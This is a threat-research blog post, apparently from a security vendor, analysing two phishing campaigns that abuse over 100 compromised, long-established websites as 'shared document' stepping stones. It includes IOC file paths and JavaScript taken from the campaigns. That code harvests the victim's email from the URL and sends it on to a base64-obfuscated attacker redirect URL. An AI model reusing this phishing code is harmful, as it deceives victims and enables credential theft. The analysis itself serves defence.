Two Active Campaigns, One Playbook

Recent research has identified two near‑identical active phishing campaigns that weaponize 100+ compromised websites to host intermediary pages. These pages sit between the phishing email and the final credential‑stealing form. They look innocuous, appearing to host a secure business document on an otherwise legitimate website, but they quietly pass tracking parameters and funnel the victim onward.

What makes these campaigns worth spotlighting is the type and age of domains being abused. We are not talking about content-hosting platforms like Canva or Google Drive, nor are we talking about newly registered domains. Most domains are older than one year, and the oldest we recorded was registered in 1997 and still touts a solid online reputation.

Compromised Sites as Stepping Stones

A handful of the abused sites we have identified belong to hosting‑only services, such as linodeobjects.com. Yet the majority of the over 100 domains appear to be real businesses whose sites have been breached and abused in these chained phishing sequences. 

The distinct domains span a wide range of countries and top‑level domains—including .com, .com.br, .gr, .ci, .in, .si, .biz, .co.za, .gov.cv, .co.ke, .tn, .fr. This wide range is also reflected in their business type and their age range.

‍

Age matters—just not the way you think

Below is the age distribution for every domain we identified hosting these campaigns’ intermediary phishing pages. Forty of them are “young” (< 1 year), but once those are removed, the average registration age is 8.3 years, and the median age is 6.3 years—proof that age-based and reputation‑based blocking is not enough to protect employees from credential-theft attacks.

‍

‍

So what do these intermediary pages look like?

‍

Social‑Engineering Lure: “Shared Document”

Both campaigns lean on the universal urge to open a business file that appears to be meant for you. We observed two unique page titles:

• Secure Document Sharing | Your Company
• Business Document Shared

‍

‍

Malicious Page Sits One Folder Deep

Each malicious file sits one folder deep (https://example.com/**folder**/**file**)—consistent enough to appear deliberate, yet far enough from the root web directory to avoid casual scans.

More than half of the file paths contain explicit file‑type keywords—such as memo, document, agreement, bid, proposal, or RFP—reinforcing the illusion that you have received access to a legitimate business file.

/tunnel/email-template.html
/bid/proposal.html
/2/kabeenet.html
/home/home.html
/bid/submission.html
/tunnel/index.html
/tunnel/dantedocs.html
/invite/policy.html

‍

For a full list of file paths observed, refer to the IOCs section.

‍

JavaScript That Knows Who You Are

A snippet from the intermediary page checks whether the URL hash property contains an email address (e.g., https://example.com/file#john.doe@example.com); or, base-64 encoded: https://example.com/file#am9obi5kb2VAZXhhbXBsZS5jb20=). If it does contain an email, the script:

‍

‍1. Auto-populates the email address into the form field. This increases the chance the victim will submit the form and move forward in the attack sequence.

‍

// Decode email from URL hash
        function getEmailFromHash() {
            let hash = window.location.hash.substring(1);
            if (!hash) return '';
            
            // Try to decode if it's Base64 encoded
            try {
                // Check if it looks like Base64
                if (hash.match(/^[A-Za-z0-9+/=]+$/)) {
                    const decoded = atob(hash);
                    if (decoded.includes('@')) {
                        return decoded;
                    }
                }
            } catch (e) {
                // Not Base64, continue with hash as is
            }
            
            return hash;
        }
        
        // Auto-populate email field if it exists in the URL hash
        document.addEventListener('DOMContentLoaded', function() {
            const emailField = document.getElementById('email');
            const emailFromHash = getEmailFromHash();
            
            if (emailFromHash && emailFromHash.includes('@')) {
                emailField.value = emailFromHash;
            }

‍

// Function to decode Base64
    function decodeBase64(str) {
        try {
            return decodeURIComponent(atob(str).split('').map(char => {
                return '%' + ('00' + char.charCodeAt(0).toString(16)).slice(-2);
            }).join(''));
        } catch (e) {
            return null; // Return null if decoding fails
        }
    }

    // Auto-populate email from URL hash
    const emailFromHash = window.location.hash.substring(1); // Remove the '#' from the hash
    if (emailFromHash) {
        let email = emailFromHash;
        // Check if the hash is Base64 encoded
        if (!emailFromHash.includes('@')) {
            email = decodeBase64(emailFromHash); // Decode Base64
        }
        if (email && email.includes('@')) {
            document.getElementById('email').value = email;
        }
    }

Snippets of JavaScript from each campaign that will extract the target’s email address from the URL’s hash property, if present.

‍

2. Passes the email address onto the final phishing page. So, even if the user never inputs their password in the final phishing page, the attacker learns that john.doe@example.com clicked on the malicious email and is a likely candidate to retarget later.

‍

 // Form submission handling
            document.getElementById('emailForm').addEventListener('submit', function(e) {
                e.preventDefault();
                
                const email = document.getElementById('email').value;
                if (!email) return;
                
                // Show loading spinner
                document.getElementById('loadingOverlay').classList.add('active');
                
                // Obfuscate the redirect URL
                const redirectBase = atob('aHR0cHM6Ly82OWU2NGU5Ny5sYmFja3VwMTMxMy53b3JrZXJzLmRldi8');
                
                // Simulate API call with rate limiting
                setTimeout(function() {
                    // Remove loading spinner
                    document.getElementById('loadingOverlay').classList.remove('active');
                    
                    // Redirect to external site with email hash
                    window.location.href = redirectBase + '?ref=' + email;
                }, 1500);
                

‍

  // Use the current file's directory for the API endpoint
            const apiUrl = window.location.pathname.replace(/\/[^\/]+$/, '/validate-captcha.php');

            const response = await fetch(apiUrl, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                    'X-Requested-With': 'XMLHttpRequest'
                },
                body: JSON.stringify({
                    email,
                    captchaResponse: captchaToken
                })
            });

            const data = await response.json();

            if (data.success && data.redirectUrl) {
                // Append the email directly after the domain (no trailing slash)
                const finalUrl = `${data.redirectUrl}#M${email}`;
                window.location.href = finalUrl;
            } else {
                throw new Error(data.error || 'Validation failed');
            }

Snippets of JavaScript from each campaign that will ultimately redirect the browser tab to a phishing page with the victim’s email address in the query parameters or hash property.

‍

We first documented this URL-based email tracking technique in our analysis of this SVG phishing email attachment.

‍

The Chained Sequence: Email → Legit Site → Phishing Form

Keep Aware’s security team is no stranger to chained phishing sequences. We have written before about attackers abusing trusted content platforms like Dropbox, Canva, and Google Drawings as stepping stones in a phishing attack. These active campaigns prove that even long-standing domains—the ones that don’t host user content—are equally at risk and follow a very similar sequence:

1. Phishing email contains a link to a compromised but reputable domain.
2. Intermediary page (on that domain) loads, presents a ‘enter your email to view a document’ call to action, executes malicious JavaScript, and redirects to the final phishing page.
3. Final phishing page harvests the victim’s credentials.

‍

‍

Precision‑Validated Phishing

After submitting an email, many malintent forms lead users to a fake Microsoft login page; some, however, provide a customized response—a blank page, a customized phishing page—depending on the email address provided. This custom response based on the email address is referred to as precision-validated phishing, or email validated phishing.

‍

This newly coined technique keeps the final phishing page off threat intel feeds for longer, letting its reputation stay “clean”. As this attacker technique increases in use, our reliance on web intel feeds lowers in effectiveness, and the need for inline page-level protection increases.

‍

Why Inline Browser Protection Matters

Because inline browser tools can interrogate each web page, looking for credential fields, background network requests, obfuscated JavaScript, and social engineering prompts, they judge a page by what it shows and does rather than its age or reputation. 

That behavioral focus means the very first time a previously unknown (i.e., zero‑day) phishing site loads, a security extension with browser-native visibility and control can identify the malicious activity, display a block banner, and ensure no credentials are stolen—long before threat intel feeds or reputation scanners even know the domain exists.

‍

Conclusion

Phishing defenses can no longer rely on lists of “known-bad” domains or the assumption that age and reputation equal safety. These two campaigns demonstrate that well‑established, legitimate websites—some online since the late 1990s—can be hijacked and pressed into service as stepping stones of malicious campaigns. By sitting one folder deep, mimicking file‑sharing flows, and selectively revealing the final form only after validating the victim’s email, attackers stretch the lifetime of their infrastructure and stay below the radar of threat intel feeds.

Defenders need controls that judge a page by its content and behavior at the moment it renders. Inline, real‑time browser protection analyzes the web page, its JavaScript, network calls, and form actions—blocking zero‑day phishing sites before they can harvest credentials. Combined with user‑centric training that teaches employees to scrutinize domains, paths, and unexpected “document” prompts, this last‑mile layer closes the gaps left by reputation‑based tools, regardless of email validation techniques or the abuse of legitimate sites.

‍

IOCs

Unique File Paths:

‍

/tunnel/email-template.html
/bid/proposal.html
/2/kabeenet.html
/home/home.html
/bid/submission.html
/tunnel/index.html
/tunnel/dantedocs.html
/invite/policy.html
/proceed/pesse.html
/record/form.html
/tunnel/home.html
/sharedsuccess/home.html
/bid/estimate.html
/champ/scanning.html
/bid/ppfpropo.html
/source/policy.html
/tunnel/file/index.html
/tunnel/wedsn.html
/tunnelvwork/eeuaakgjhguuuadobeflowscannedf1le.html
/secure/
/workers-team/email-template.html
/RNP58387966C2BB/scan.html
/panthera/bidpackages/a9tmjwEh2qLJw3bhZK5METbPIGprzt.html
/incoming-bid-proposal/psconstruction.html
/tunnel/qgov.html
/furniture/home.html
/zoom/scan.html
/memo/home.html
/tunnel/madriducldoc.html
/tunel/bigbangdocs.html
/developer/preview-form.html
/archiev/policy.html
/drive/proposal028.html
/1/newdocuments.html
/iron/email-template.html
/autodocs/email-template.html
/re/email.html
/bid/propose.html
/content/fileshare
/au/email-template.html
/active/email-template.html
/tunnel/email-prodoc.html
/accept/email-template.html
/wp-admin/css/main/policy.html
/acquired/email-template.html
/team-work-unity/email-template.html
/timing-construct/email-template.html
/collectrd/email-template.html
/tunnel/futuredocs.html
/offers/homie.html
/document/newventure.html
/invitation/secure.html
/team/home.html
/fileshare/company.html
/tunnel/tuesm.html
/cstorefile/email-template.html
/4/email-template.html
/rev/projectview.html
/master/march2025.html
/team-workers/email-template.html
/sui/email-template.html
/tunnel/tryinggthis%20to%20see.html
/1/sgw.html
/realestate/deals.html
/SKMT234542234/email-template.html
/weekly-ap/email-template.html
/legalframework/email-template.html
/service/law.html
/Project/Project.html
/educ/pesse.html
/tunel/newcastledocs.html
/Realestate/email-template.html
/04042025/april4th.html
/woqp/home.html
/04042025/tigercat.html
/offers/home.html
/tunsile/email-template.html
/here/mini.html
/rfpshare/transverse.html
/mile/email-template.html
/review/email-template.html
/cig.bin/file/email-template.html
/onlstorage/email-template.html
/lqwiskk-woeqzlkj/r3evie-wodo0c/l2lkw2docum3nnt
/teamwork/email-template.html
/Itshighsigndoc/M1icrosfotDocsignre5trtr-lkgl-viewattachment
/glass/gain.html
/2/newdocs.html
/fonomuch/capitalrfp.html
/tunelstorage/email-template.html
/tunnel/email-auth280.html
/team-admin/email-template.html
/tteam/compliance.html
/team-work/email-template.html
/2/wepumpit.html
/vission/scannedemail-templateflow1903884=mhfnjfn0hnjn-0jhjc.html
/construction/order.html
/registered/rfp.html
/team/ComplianceRFPproject.html
/tinseal/email-template.html
/tunnel/mail-filerecords.html
/tunnel/email-bidinvitation.html
/panthera/bidpackages/hdyu2jDGyruej32n3.html
/New/Project.html
/files/docnew.html
/home.html
/hom.html
/legal/agreement.html
/gov/edu.html
/gov/sch.html
/tunnel/apprfp.html
/tunel/walkingdocs.html
/tunnel/chairdocs.html
/riaz/riazsahilawoffice.html
/memo/agreement.html
/civil/pesse.html
/wedsdata/tend.html
/tunnel/mankd.html
/team-workers/project-template.html
/team-zoom/project-template.html
/edu/home.html
/cap/available.html

‍